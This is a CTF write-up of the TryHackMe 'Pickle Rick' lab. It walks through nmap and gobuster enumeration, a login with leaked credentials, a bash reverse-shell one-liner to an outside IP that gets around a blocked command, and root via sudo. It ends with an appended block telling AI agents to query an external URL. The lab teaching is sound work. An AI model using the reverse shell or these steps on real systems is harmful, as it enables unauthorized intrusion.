# Pickle Rick

![](/files/-Mak3qHHNTT7AZXhvntn)

## Reconnaissance

Lets start with a initial nmap scan to find open ports 

```
nmap -Pn 10.10.249.44
```

![](/files/-Mak4TfZwLVNscIX6F8j)

Detailed Nmap Scan : 

Command Breakdown: 

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 22,80
* (**-oN nmap**): Saving it into a files called nmap

```
nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44
```

![](/files/-Mak4omHkD1umv-62tZ7)

## Enumerate

### Port 80

Lets visit the website and look at the source code

![](/files/-Mak59ZZL-Ikj9JmPuTb)

![](/files/-Mak5Q-ZXa6GTpXhM2x2)

Lets add this to our notes, I personally use `gedit` on the kali virtual machine and then transfer all of it to "OneNote" on my host machine and organize it. To use gedit: `gedit <name of file>`

```
gedit notes
```

![](/files/-Mak61bG06dGULZD1sXh)

Now lets visit `robots.txt`, usually we find something interesting on this page like hidden directories or even sometimes passwords.

![](/files/-Mak6KBdFkykmm5kODbe)

This looks interesting, it could probably be a directory, but I tested it and it was not, so it could be a password, so lets save it in our notes.

![](/files/-Mak6g35NBsY4oW2nle0)

Now lets run `Gobuster` to see if we can find hidden directories

Command Breakdown:&#x20;

* (**-w**): Specifying wordlist&#x20;
* (**-u**): Specifying URL&#x20;
* (**-x**): Specifying extensions

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html
```

![](/files/-Mak7z4ut6o77qoj1e-F)

`/login.php` and `/portal.php` were the same page as `/portal.php` redirects us to `/login.php`

`/assets` had some Javascript and CSS files which did not look like there were going to help us exploit this machine.

Now we found ourselves a login page

![](/files/-Mak8c1nHLkBRdh-gUuC)

And if we look at our notes, we have a username and a possible password, lets try using them to login.

And we got in!!

![](/files/-Mak8pKJXygZciFGyKt4)

We have a command panel where we can run some commands, lets explore it.

Running `ls`gives us some files present in the current directory

![](/files/-Mak92SwiNO5uhsd1XXP)

Lets try reading those files

```
cat Sup3rS3cretPickl3Ingred.txt
```

And.... the command is disabled, so what can we do here, if we try different commands we can see that many commands are allowed but `cat` is not allowed. After a lot of searching I found a command that gave us reverse shell on the server.

```
bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'
```

![](/files/-MakAW5XRYnEICvr7Cd9)

And now we can read the contents of Sup3rS3cretPickl3Ingred.txt.

```
cat Sup3rS3cretPickl3Ingred.txt
```

![](/files/-MakAfFCwS8uks8a9-Kh)

This is answer for the first question

![](/files/-MakAotQjh0dgx8boXr2)

Now lets enumerate the machine and find a way to get root

## Privilege Escalation

While looking around I found the second ingredient which is the second answer.

![](/files/-MakBMeygdKVJTasbFEk)

![](/files/-MakCEM1zhuoGtTV3FUG)

Now lets try to become root to cd into the root directory as I think the final ingredient is hidden there, lets run the command `sudo -l` to see if we can files as other users.

```
sudo -l
```

![](/files/-MakBgSEG-UgzC5x0vAD)

We are allowed to run ALL, so lets try switching users to root using the command `su`

```
sudo su
```

![](/files/-MakBx2JcRQGxaVslufw)

And we are root! We can also see the 3rd and final ingredient in the root directory

![](/files/-MakC8pwOhs6g1l05IOj)

![](/files/-MakCICyd9MeI-b1yeBi)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/untitled/pickle-rick.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.